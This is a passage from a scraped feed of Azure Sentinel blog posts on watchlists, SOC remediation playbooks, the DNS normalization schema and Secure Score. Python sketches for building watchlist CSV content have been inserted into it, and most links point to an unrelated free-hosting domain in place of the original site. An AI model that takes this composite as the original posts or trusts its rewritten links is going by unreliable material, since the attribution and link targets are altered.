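ROW_TERMINATOR = "\r\n"  # the \r\n that ends every CSV row in rawContent


def check_cell(cell):
    """Return a problem description, or None if the cell is safe to emit."""
    # A comma or line break would be read as a cell or row boundary.
    if "," in cell or "\r" in cell or "\n" in cell:
        return f"cell {cell!r} contains a separator character"
    # The page notes that values are space sensitive: " Admin" is stored
    # with its leading space and will not match "Admin" in a lookup.
    if cell != cell.strip():
        return f"cell {cell!r} has leading or trailing whitespace"
    return None


def build_raw_content(columns, rows, search_key):
    """Return the CSV text for rawContent: header row first, then one line per row."""
    if search_key not in columns:
        raise ValueError(f"search key {search_key!r} is not one of the columns")
    lines = []
    for record in [columns, *rows]:
        if len(record) != len(columns):
            raise ValueError(f"row {record!r} has {len(record)} cells, expected {len(columns)}")
        for cell in record:
            problem = check_cell(cell)
            if problem:
                raise ValueError(problem)
        lines.append(",".join(record))
    return ROW_TERMINATOR.join(lines) + ROW_TERMINATOR


def parse_raw_content(raw):
    """Inverse of build_raw_content: (columns, rows) as the Watchlist will read them."""
    lines = raw.split(ROW_TERMINATOR)
    if lines and lines[-1] == "":
        lines.pop()  # the trailing terminator leaves an empty last element
    table = [line.split(",") for line in lines]
    return table[0], table[1:]


def build_watchlist_resource(workspace_name, watchlist_name, search_key, columns, rows):
    """Return the resource dict shaped like the page's template fragment."""
    return {
        # The template uses concat(parameters('workspaceName'), ...); a literal
        # is substituted here so the block runs without an ARM deployment.
        "name": f"{workspace_name}/Microsoft.SecurityInsights/{watchlist_name}",
        "type": "Microsoft.OperationalInsights/workspaces/providers/Watchlists",
        "kind": "",
        "properties": {
            "displayName": watchlist_name,
            "source": f"{watchlist_name}.csv",
            "description": "Constructed sample Watchlist.",
            "provider": "Custom",
            "isDeleted": False,
            "labels": [],
            "defaultDuration": "P1000Y",
            "contentType": "Text/Csv",
            "numberOfLinesToSkip": 0,
            "itemsSearchKey": search_key,
            "rawContent": build_raw_content(columns, rows, search_key),
        },
    }


# Constructed sample following the IP / Account / Machine layout on the page
# (documentation addresses from 192.0.2.0/24, placeholder account and host names).
SAMPLE_COLUMNS = ["SEARCHKEYCOLUMN", "Account", "Machine"]
SAMPLE_ROWS = [
    ["192.0.2.10", "Admin", "ContosoMachine1"],
    ["192.0.2.11", "LocalUser", "ContosoMachine2"],
]

if __name__ == "__main__":
    resource = build_watchlist_resource(
        "contoso-workspace", "ContosoAssets", "SEARCHKEYCOLUMN", SAMPLE_COLUMNS, SAMPLE_ROWS
    )
    print(json.dumps(resource, indent=2))
```

Because parse_raw_content splits the string the same way the Watchlist will, round-tripping a generated rawContent through it is a quick way to confirm that every cell, including the SearchKey column, comes back exactly as intended; the Watchlist template example linked above remains the starting point for the surrounding template.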
This template is meant to serve as the building block for custom templates and can be used as needed.</DIV> <P>&nbsp;</P> <P>Time to get creative and start building custom Watchlists today!</P> </DIV> </DIV> </DIV> Wed, 16 Jun 2021 21:22:34 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-watchlist-support-for-arm-templates/ba-p/2424429 Matt_Lowe 2021-06-16T21:22:34Z Enhanced Azure Sentinel Alert remediation in the SOC Process Framework https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/enhanced-azure-sentinel-alert-remediation-in-the-soc-process/ba-p/2452430 <P>Microsoft’s Azure Sentinel now provides a Timeline view within the Incident where alerts display remediation steps. The list of alerts that have remediations provided by Microsoft will continue to grow. As you can see in the graphic below, one or more remediation steps are contained in each alert. These remediation steps tell you what to do with the alert or Incident in question.&nbsp;</P> <P>&nbsp;</P> <P><STRONG>However, what if you want to have your own steps, or what if you have alerts without any remediation steps?</STRONG></P> <P>&nbsp;</P> <P>Now available to address this is the Get-SOCActions Playbook found in GitHub (<A href="#" target="_blank" rel="noopener">Azure-Sentinel/Playbooks/Get-SOCActions at master · Azure/Azure-Sentinel (github.com)</A>). This playbook uses a .csv file, uploaded to your Azure Sentinel instance as a Watchlist, containing the steps your organization wants an analyst to take to remediate the Incident they are triaging. 
More on this in a minute.</P> <P><BR />Below is an example of a provided Remediation from one of the Alerts:</P> <P>&nbsp;</P> <P><STRONG>Example Remediation Steps Provided by Microsoft</STRONG></P> <OL> <LI>Enforce the use of strong passwords and do not re-use them across multiple resources and services</LI> <LI>In case this is an Azure Virtual Machine, set up an NSG allow list of only expected IP addresses or ranges. (see <A href="#" target="_blank" rel="noopener">https://azure.microsoft.com/en-us/documentation/articles/virtual-networks-nsg/</A>)</LI> <LI>In case this is an Azure Virtual Machine, lock down access to it using network JIT (see <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/security-center/security-center-just-in-time</A>)</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture1.png" style="width: 404px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289067i0D90941E59E919D3/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.png" alt="Picture1.png" /></span></P> <P><EM>Remediation steps were added to the Timeline View recently in Azure Sentinel, as shown above</EM></P> <P>&nbsp;</P> <P>We highly encourage you to look at the <A href="https://gorovian.000webhostapp.com/?exam=Remediation%20steps%20were%20added%20to%20the%20Timeline%20View%20recently%20in%20Azure%20Sentinel,%20shown%20here:" target="_blank" rel="noopener">SOC Process Framework blog</A>, Playbook and the amazing Workbook; you may have already noticed the SocRA Watchlist which was called out in that article. It is a .csv file that Rin published, and is the template you need to build your own steps (or just use the enhanced ones provided by Rin).&nbsp;</P> <P>It’s this .csv file that creates the Watchlist that forms the basis of enhancing your SOC process for remediation; it’s used in both the Workbook and the Playbook.&nbsp; The .csv file has been used as it’s an easy-to-edit 
format (in Excel or Notepad etc…); you just need to amend the rows, or even add your own rows and columns for new Alerts or steps you would like.&nbsp; There are columns called <STRONG>A</STRONG>1, <STRONG>A</STRONG>2 etc… these are essentially <STRONG>A</STRONG>nswer1 (Step1), <STRONG>A</STRONG>nswer2 (Step2) etc…<BR />Example of a new Alert that has been added: <BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture2.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289069i526143045D2EE47E/image-size/large?v=v2&amp;px=999" role="button" title="Picture2.png" alt="Picture2.png" /></span></P> <P>You can also add a DATE in the last column (of when the line in the watchlist was <EM>updated</EM>). Note that any URL link will appear in its own column in the [Incident Overview] workbook – we parse the string so it can be part of a longer line of text in any of the columns headed <STRONG>A</STRONG>1 thru <STRONG>A</STRONG>19 (you can add more answers if required, just insert more columns named A20, A21 etc… after column A19).&nbsp; Just remember to save your work as a .CSV.</P> <P>&nbsp;</P> <H3>How to install the Watchlist file<BR /><BR />You must download the Watchlist file (then edit as required); it’s called SOCAnalystActionsByAlert.csv (<A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/docs/SOCAnalystActionsByAlert.csv</A>)</H3> <P>Then when you name the Watchlist, our suggestion is “SOC Recommended Actions”; make sure you set the ‘Alias’ to: <STRONG>SocRA</STRONG></P> <P>Important: <STRONG>S</STRONG>oc<STRONG>RA</STRONG> is case sensitive; you need an uppercase S, R and A.</P> <P><BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture3.png" style="width: 385px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289070iE1D07724F049D298/image-size/large?v=v2&amp;px=999" 
role="button" title="Picture3.png" alt="Picture3.png" /></span><BR />You should now have entries in Log Analytics for the SocRA alias.<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture4.png" style="width: 429px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289072i1B08ACA93D605C2B/image-size/large?v=v2&amp;px=999" role="button" title="Picture4.png" alt="Picture4.png" /></span></P> <P>The SocRA watchlist .csv file serves both the Incident Overview Workbook and the Get-SOCActions Playbook, should you want to push Recommended Actions to the <STRONG>Comments</STRONG> section of the Incident your Analyst is working on. You will want to keep this in mind when you edit the SocRA watchlist. The Get-SOCActions Playbook relies on the column layout of the SocRA watchlist, i.e. A1 – A19, Alert, Date, when querying the watchlist for Actions. If the alert is not found, or has not been onboarded, the Playbook then defaults to a set of questions pulled from the SOC Process Framework Workbook to help the analyst triage the alert &amp; Incident.</P> <P><STRONG>Important</STRONG> - Should you decide to add more steps to the watchlist .csv file beyond A1-A19, you will need to edit the Playbook’s conditions to include the additional step(s) you added in the JSON response, the KQL query, and the variable HTML formatting, prior to committing the steps to the Incident’s Comments section.</P> <P>&nbsp;</P> <H3><STRONG>Incident Overview Workbook</STRONG></H3> <P>To make Investigation easier, we have integrated the above Watchlist with the default “Investigation Overview” Workbook you see; just click on the normal link from within the Incident blade:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture5.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289073iAAD2FCCAB11AF5EA/image-size/large?v=v2&amp;px=999" 
role="button" title="Picture5.png" alt="Picture5.png" /></span></P> <P>This will still open the Workbook as usual.&nbsp; Whilst I was making changes, I also colour coded the alert <STRONG>status</STRONG> and <STRONG>severity</STRONG> fields (Red, Amber and Green), just to make them stand out a little, and Blue for new alerts.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture6.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289074i668CEA84788259C7/image-size/large?v=v2&amp;px=999" role="button" title="Picture6.png" alt="Picture6.png" /></span></P> <P>If an alert has NO remediations, nothing will be visible in the workbook.&nbsp; However, if the alert has a remediation and there is no Watchlist called SocRA, then you will be able to expand the menu that will appear:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture7.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289075iE0F3CC1765518219/image-size/large?v=v2&amp;px=999" role="button" title="Picture7.png" alt="Picture7.png" /></span></P> <P>This will show the default or basic remediations that the alert has; in this example there are 3 remediation steps shown.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture8.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289076i9964CA8EBA1DF6C2/image-size/large?v=v2&amp;px=999" role="button" title="Picture8.png" alt="Picture8.png" /></span></P> <P>If you <STRONG>have</STRONG> the <STRONG>SocRA</STRONG> watchlist installed, then you will see that data shown <EM>instead</EM> (as the Watchlist is the authoritative source, rather than the steps in the alert).&nbsp; In this example there is a 4<SUP>th</SUP> step (A4) shown, which is specific to the Watchlist and the specific alert called 
“Suspicious authentication activity”.<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture9.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289077iBA2849F94CA375F4/image-size/large?v=v2&amp;px=999" role="button" title="Picture9.png" alt="Picture9.png" /></span></P> <P>&nbsp;</P> <H3><STRONG>Conclusion </STRONG></H3> <P>In conclusion, these Workbooks, the Playbook, and Watchlist all work together in concert to provide you with a customized solution to creating remediation steps that are tailored to a specific line of business. As you on-board custom analytics/detections that are pertinent to your business, you will have actions you will want an analyst to take and this solution provides a mechanism for delivering the right actions per analytic/use-case.</P> <H3><STRONG><BR />Thanks for reading!</STRONG></H3> <P>We hope you found the details of this article interesting. Thanks <STRONG>Clive</STRONG> <STRONG>Watson</STRONG> and <STRONG>Rin</STRONG> <STRONG>Ure</STRONG> for writing this Article and creating the content for this solution.</P> <P>And a special thanks to <STRONG>Sarah Young</STRONG> and <STRONG>Liat Lisha</STRONG> for helping us to deploy this solution.</P> <H3><STRONG><BR />Links</STRONG></H3> <P><STRONG>&nbsp;</STRONG></P> <TABLE> <THEAD> <TR> <TD width="210"> <P><STRONG>Content</STRONG></P> </TD> <TD width="392"> <P><STRONG>Link</STRONG></P> </TD> </TR> </THEAD> <TBODY> <TR> <TD width="210"> <P>SOC process Framework Wiki <A href="#" target="_blank" rel="noopener">SOC Process Framework · Azure/Azure-Sentinel Wiki (github.com)</A></P> <P>&nbsp;</P> <P>Main SOC Process Framework Blog, author Rin Ure</P> </TD> <TD width="392"> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-workbook/ba-p/2339315" target="_blank" 
rel="noopener">https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-workbook/ba-p/2339315</A></P> </TD> </TR> <TR> <TD width="210"> <P>SOC Process Framework Workbook, author Rin Ure</P> </TD> <TD width="392"> <P><A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/Workbooks/SOCProcessFramework.json</A></P> </TD> </TR> <TR> <TD width="210"> <P>Incident Overview Workbook, amended by Clive Watson for remediation and watchlist integration</P> </TD> <TD width="392"> <P><A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/Workbooks/IncidentOverview.json</A></P> </TD> </TR> <TR> <TD width="210"> <P>Watchlist, author Rin Ure</P> </TD> <TD width="392"> <P><A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/docs/SOCAnalystActionsByAlert.csv</A></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> Wed, 16 Jun 2021 21:13:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/enhanced-azure-sentinel-alert-remediation-in-the-soc-process/ba-p/2452430 Clive Watson 2021-06-16T21:13:09Z What’s New: Azure Sentinel Update Watchlist UI Enhancements https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-update-watchlist-ui-enhancements/ba-p/2451476 <P><EM>This blog post is a collaboration between&nbsp;</EM><A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/87823" target="_blank" rel="noopener"><EM>@Cristhofer Munoz</EM></A><EM>&nbsp;and&nbsp;</EM><A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/301871" target="_blank" rel="noopener"><EM>@JulianGonzalez</EM></A><EM>&nbsp;</EM></P> <P>&nbsp;</P> <P><EM>This installment is part of a broader series to keep you up to date with the latest features/enhancements in Azure Sentinel. 
The installments will be bite-sized to enable you to easily digest the new content.</EM></P> <P><EM>&nbsp;</EM></P> <H2><STRONG>Introduction</STRONG></H2> <P><STRONG>&nbsp;</STRONG></P> <P>Security operations (SecOps) teams need to be equipped with the tools that empower them to efficiently detect, investigate, and respond to threats across the enterprise. Azure Sentinel watchlists empower organizations to shorten investigation cycles and enable rapid threat remediation by providing the ability to collect external data sources for correlation with security events. Additionally, correlations and analytics help SecOps stay apprised of bad actors and compromised entities across the environment. Incorporating external data and performing correlation across analytics allows security teams to get a better view of their entire infrastructure and take steps to reduce risk.</P> <P>&nbsp;</P> <P>Due to the evolving and constantly changing cybersecurity landscape that we live in, it is very challenging for SecOps to stay apprised of new indicators of compromise.</P> <P>&nbsp;</P> <P>Azure Sentinel Watchlists provide the ability to quickly import IP addresses, file hashes, etc. from CSV files into your Azure Sentinel workspace.&nbsp; You can then utilize the watchlist name/value pairs for joining and filtering in alert rules, threat hunting, workbooks, notebooks and general queries.</P> <P>&nbsp;</P> <P>Due to the constant change, security analysts need the flexibility to update watchlists to stay ahead. 
With that in mind, we are super excited to announce the Azure Sentinel Watchlist enhancements that empower security analysts to drive efficiency by enabling the ability to update or add items to a watchlist using an intuitive user interface.</P> <P>&nbsp;</P> <P>---------------------------------------------------------------------</P> <P>For additional use case examples, please refer to these relevant blog posts:</P> <P>&nbsp;</P> <P>Utilize Watchlists to Drive Efficiency during Azure Sentinel Investigations:</P> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/utilize-watchlists-to-drive-efficiency-during-azure-sentinel/ba-p/2090711" target="_blank" rel="noopener">Utilize Watchlists to Drive Efficiency During Azure Sentinel Investigations - Microsoft Tech Community</A></P> <P>&nbsp;</P> <P>Playbooks &amp; Watchlists Part 1: Inform the subscription owner</P> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-1-inform-the-subscription-owner/ba-p/1768917" target="_blank" rel="noopener">https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-1-inform-the-sub...</A></P> <P>&nbsp;</P> <P>Playbooks &amp; Watchlists Part 2: Automate incident response</P> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-2-automate-incident-response-for/ba-p/1771676" target="_blank" rel="noopener">https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-2-automate-incid...</A></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Please refer to our public documentation for </SPAN><A href="#" target="_blank" rel="noopener noreferrer"><SPAN data-contrast="none">additional details</SPAN></A><SPAN data-contrast="auto">.</SPAN></P> 
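<P>As an added example (not code from either post, nor from the Get-SOCActions Playbook), the following Python sketch ties the watchlist name/value join described above to the SocRA watchlist from the previous post: rows keyed by Alert with steps in A1..A19, a fallback to default triage questions when an alert has not been onboarded, and URLs split out of a step the way the Incident Overview workbook does. The sample rows, the default questions and the case-insensitive match are constructed assumptions.</P>

```python
import csv
import io
import re
from dataclasses import dataclass

# Column layout the Get-SOCActions Playbook and the Incident Overview workbook
# expect from the SocRA watchlist: the Alert name, answer columns A1..A19
# (one remediation step each) and the Date the row was last updated.
ANSWER_COLUMNS = [f"A{i}" for i in range(1, 20)]
WATCHLIST_COLUMNS = ["Alert", *ANSWER_COLUMNS, "Date"]

# Constructed sample rows; not the published SOCAnalystActionsByAlert.csv.
SAMPLE_ROWS = [
    {"Alert": "Suspicious authentication activity",
     "A1": "Confirm the sign-in with the account owner",
     "A2": "Reset the password and revoke refresh tokens",
     "A3": "Check for newly registered MFA methods or inbox rules",
     "A4": "Restrict the VM with an NSG allow list, see "
           "https://azure.microsoft.com/en-us/documentation/articles/virtual-networks-nsg/ "
           "and enable JIT access",
     "Date": "2021-06-01"},
    {"Alert": "Known Barium domains",
     "A1": "Identify every host that resolved the domain",
     "A2": "Isolate the host and collect a triage package",
     "Date": "2021-05-20"},
]

# Fallback questions for alerts missing from the watchlist; constructed
# stand-ins for the SOC Process Framework questions the Playbook uses.
DEFAULT_TRIAGE_QUESTIONS = [
    "Is the affected entity a privileged account or critical asset?",
    "Has the same activity been observed elsewhere in the environment?",
    "Is this activity expected for this user, host and time of day?",
]

URL_RE = re.compile(r"https?://[^\s,;]+")


def build_watchlist_csv(rows):
    """Serialise rows in the SocRA column layout (what you would upload)."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=WATCHLIST_COLUMNS, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({col: row.get(col, "") for col in WATCHLIST_COLUMNS})
    return buf.getvalue()


def load_watchlist(csv_text):
    """Parse a SocRA CSV into name/value rows, the shape _GetWatchlist('SocRA')
    returns in KQL. Fails early if the expected columns are missing."""
    reader = csv.DictReader(io.StringIO(csv_text))
    missing = [c for c in WATCHLIST_COLUMNS if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"watchlist is missing columns: {missing}")
    return [{k: (v or "").strip() for k, v in row.items() if k} for row in reader]


def split_links(step):
    """Separate a step's free text from any URLs embedded in it, as the
    Incident Overview workbook does to show each link in its own column."""
    links = URL_RE.findall(step)
    text = re.sub(r"\s{2,}", " ", URL_RE.sub("", step)).strip()
    return text, links


@dataclass
class RecommendedActions:
    alert: str
    source: str   # "SocRA" when taken from the watchlist, else "default"
    updated: str  # Date column of the matching row, empty for defaults
    steps: list


def recommended_actions(watchlist, alert_name):
    """Join the alert name against the watchlist's Alert column and return the
    populated A1..A19 steps in order, or the default triage questions when the
    alert has not been onboarded. Case-insensitive matching is an assumption
    here; the Playbook's own KQL may compare differently."""
    wanted = alert_name.strip().casefold()
    for row in watchlist:
        if row["Alert"].casefold() == wanted:
            steps = [row[c] for c in ANSWER_COLUMNS if row[c]]
            return RecommendedActions(alert_name, "SocRA", row["Date"], steps)
    return RecommendedActions(alert_name, "default", "", list(DEFAULT_TRIAGE_QUESTIONS))


def render_comment(actions):
    """Format the steps as a numbered incident comment (plain text here; the
    Playbook builds HTML, which is omitted)."""
    lines = [f"Recommended actions for '{actions.alert}' ({actions.source})"]
    if actions.updated:
        lines.append(f"Watchlist row last updated: {actions.updated}")
    for n, step in enumerate(actions.steps, 1):
        text, links = split_links(step)
        lines.append(f"{n}. {text}")
        lines.extend(f"   link: {url}" for url in links)
    return "\n".join(lines)


if __name__ == "__main__":
    watchlist = load_watchlist(build_watchlist_csv(SAMPLE_ROWS))
    print(render_comment(recommended_actions(watchlist, "Suspicious authentication activity")))
    print(render_comment(recommended_actions(watchlist, "My new custom analytic")))
```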
<P>---------------------------------------------------------------------</P> <P>&nbsp;</P> <H2>Watchlist Updating Functionality</H2> <P>&nbsp;</P> <P>The new watchlist UI encompasses the following functionality:</P> <P>- Add new watchlist items or update existing watchlist items.</P> <P>- Select and update multiple watchlist items at once via an Excel-like grid.</P> <P>- Add/remove columns from the watchlist update UI view for better usability.</P> <P>&nbsp;</P> <H3>How to update a watchlist</H3> <P><SPAN data-contrast="none">From the Azure portal, navigate to </SPAN><STRONG><SPAN data-contrast="none">Azure Sentinel</SPAN></STRONG><SPAN data-contrast="none"> &gt; </SPAN><STRONG><SPAN data-contrast="none">Configuration</SPAN></STRONG><SPAN data-contrast="none"> &gt; </SPAN><STRONG><SPAN data-contrast="none">Watchlist</SPAN></STRONG></P> <P>&nbsp;</P> <P><SPAN data-contrast="none"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="watchlist.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289001i21DCB8CA6AA6C896/image-size/large?v=v2&amp;px=999" role="button" title="watchlist.jpg" alt="watchlist.jpg" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">Select a <STRONG>Watchlist</STRONG>, then select <STRONG>Edit Watchlist Items</STRONG></SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="watchlist2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289007iEF4FDAAD95126FFF/image-size/large?v=v2&amp;px=999" role="button" title="watchlist2.png" alt="watchlist2.png" /></span></P> <P>&nbsp;</P> <P>Select <STRONG>Add New</STRONG>, then update the watchlist parameters</P> <P>&nbsp;</P> <P><span
class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="addnew.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289009iDC70CA5DAF41F6A7/image-size/large?v=v2&amp;px=999" role="button" title="addnew.gif" alt="addnew.gif" /></span></P> <P>&nbsp;</P> <H2 id="toc-hId-1758710297">Get started today!</H2> <P>&nbsp;</P> <P>We encourage you to try out the new Watchlist update UI enhancement to drive efficiency across your data correlation.</P> <P>&nbsp;</P> <P>Try it out, and <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bd-p/AzureSentinel" target="_blank" rel="noopener" data-event="page-clicked-link" data-bi-id="page-clicked-link" data-bi-area="content">let us know</A> what you think!</P> <P>&nbsp;</P> Wed, 16 Jun 2021 21:32:53 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-update-watchlist-ui-enhancements/ba-p/2451476 Cristhofer Munoz 2021-06-16T21:32:53Z What's new: Azure Sentinel Information Model DNS Schema and normalized content now public https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-information-model-dns-schema-and/ba-p/2429926 <P>I’m excited to announce the second step in our normalization journey. Following our networking schema, we now extend our <A href="#" target="_self">Azure Sentinel Information Model (ASIM) guidance</A> and release our <A href="#" target="_self">DNS schema</A>. 
We expect to follow suit with additional schemas in the coming weeks.</P> <P>&nbsp;</P> <P>Special thanks to <STRONG>Yaron Fruchtmann</STRONG> and <STRONG>Batami Gold</STRONG>, who made all this possible.</P> <P>&nbsp;</P> <P>This release includes additional artifacts to ensure easier use of ASIM:</P> <P>&nbsp;</P> <UL> <LI>A new, extensive <A href="#" target="_self">overview of the Azure Sentinel Information Model (ASIM)</A>, including schema guidelines and a parser writing guide.</LI> </UL> <P>&nbsp;</P> <UL> <LI>All the normalizing parsers can be deployed in a click using an <A href="#" target="_self">ARM template</A>. The initial release contains normalizing parsers for Infoblox, Cisco Umbrella, and Microsoft DNS server.</LI> </UL> <P>&nbsp;</P> <UL> <LI>We have migrated analytic rules that worked on a single DNS source to use the normalized template. Those are available in GitHub and will be available in the in-product gallery in the coming days. You can find the list at the end of this post.</LI> </UL> <P>&nbsp;</P> <UL> <LI>And of course, the <A href="#" target="_self">schema documentation</A> is available on docs.microsoft.com.</LI> </UL> <P>&nbsp;</P> <P>With single-click deployment and support for normalized content in analytic rules, we believe we will see accelerated adoption of the Azure Sentinel Information Model.</P> <P>&nbsp;</P> <P>Join us to learn more about the Azure Sentinel Information Model in <A href="#" target="_self">two webinars</A>:</P> <UL> <LI><STRONG>The Information Model: Understanding Normalization in Azure Sentinel</STRONG></LI> <LI><STRONG>Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content</STRONG></LI> </UL> <P>&nbsp;</P> <H2>Why normalization, and what is the Azure Sentinel Information Model?</H2> <P><BR />Working with various data types and tables together presents a challenge. 
You must become familiar with many different data types and schemas, and write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P><BR />The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the Open-Source Security Events Metadata (OSSEM) common information model, promoting vendor-agnostic, industry-wide normalization. ASIM:</P> <P>&nbsp;</P> <UL> <LI>Allows source-agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in Sentinel workspaces</LI> </UL> <P>&nbsp;</P> <P>The current implementation is based on query-time normalization using KQL functions, and includes the following:</P> <P>&nbsp;</P> <UL> <LI>Normalized schemas cover standard sets of predictable event types that are easy to work with and to build unified capabilities on. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI>Parsers map existing data to the normalized schemas. Parsers are implemented using KQL functions.</LI> <LI>Content for each normalized schema includes analytics rules, workbooks, hunting queries, and additional content. This content works on any normalized data without the need to create source-specific content.<BR /><BR /></LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="POWERPNT_kovE7KHr8z.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/287436i766C13090426B7A7/image-size/large?v=v2&amp;px=999" role="button" title="POWERPNT_kovE7KHr8z.png" alt="POWERPNT_kovE7KHr8z.png" /></span></P> <P>&nbsp;</P> <H2>Why normalize DNS data?</H2> <P>&nbsp;</P> <P>ASIM is especially useful for DNS. 
Different DNS servers and DNS security solutions, such as Infoblox, Cisco Umbrella and the Microsoft DNS server, produce logs in highly non-standard formats even though they represent similar information, namely DNS protocol activity. With normalization, standard, source-agnostic content applies to all DNS servers without being customized for each one. In addition, an analyst investigating an incident can query the DNS data in the system without specific knowledge of the source providing it.</P> <P>&nbsp;</P> <H2>Analytic Rules added or updated to work with ASIM DNS</H2> <UL> <LI>Added: <UL> <LI>Excessive NXDOMAIN DNS Queries (Normalized DNS)</LI> <LI>DNS events related to mining pools (Normalized DNS)</LI> <LI>DNS events related to ToR proxies (Normalized DNS)</LI> </UL> </LI> <LI>Updated to include normalized DNS: <UL> <LI>Known Barium domains</LI> <LI>Known Barium IP addresses</LI> <LI>Exchange Server Vulnerabilities Disclosed March 2021 IoC Match</LI> <LI>Known GALLIUM domains and hashes</LI> <LI>Known IRIDIUM IP</LI> <LI>NOBELIUM - Domain and IP IOCs - March 2021</LI> <LI>Known Phosphorus group domains/IP</LI> <LI>Known STRONTIUM group domains - July 2019</LI> <LI>Solorigate Network Beacon</LI> <LI>THALLIUM domains included in DCU takedown</LI> <LI>Known ZINC Comebacker and Klackring malware hashes</LI> </UL> </LI> </UL> Tue, 15 Jun 2021 18:55:32 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-information-model-dns-schema-and/ba-p/2429926 Ofer_Shezaf 2021-06-15T18:55:32Z Microsoft Defender Security Insights in Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-defender-security-insights-in-azure-sentinel/ba-p/2359705 <P><STRONG>Overview</STRONG></P> <P>&nbsp;</P> <P><SPAN>Thanks to <LI-USER uid="572591"></LI-USER> (Program Manager - Azure Sentinel) and <LI-USER uid="329567"></LI-USER> (Program Manager - Azure Sentinel) for the technical brainstorming, contribution, implementation and proof 
reading!&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN>Microsoft Secure Score is a security analytics solution that gives you visibility into your security portfolio and how to improve it. Azure Sentinel is a SaaS Security Information and Event Management (SIEM) solution providing visibility and management of the threats in an environment.&nbsp; The following blog shows how you can leverage Azure Sentinel to gain visibility into Microsoft Secure Score alongside other security data.</SPAN></P> <P>&nbsp;</P> <P><STRONG>Requirements &amp; Use Cases</STRONG></P> <P>&nbsp;</P> <P>SOC teams want to pull and ingest Microsoft Secure Score data, recommendations, profiles, and Azure Defender, Microsoft 365, Microsoft Defender for Endpoint, and Microsoft Cloud App Security data into Azure Sentinel for further investigation, compliance and security hygiene purposes, to have a consolidated, unified security posture view, in addition to the following use cases:</P> <P>&nbsp;</P> <UL> <LI>Monitor, track and report on their organization's configuration baseline and score in downstream reporting tools.</LI> <LI>Integrate the data into compliance or cybersecurity 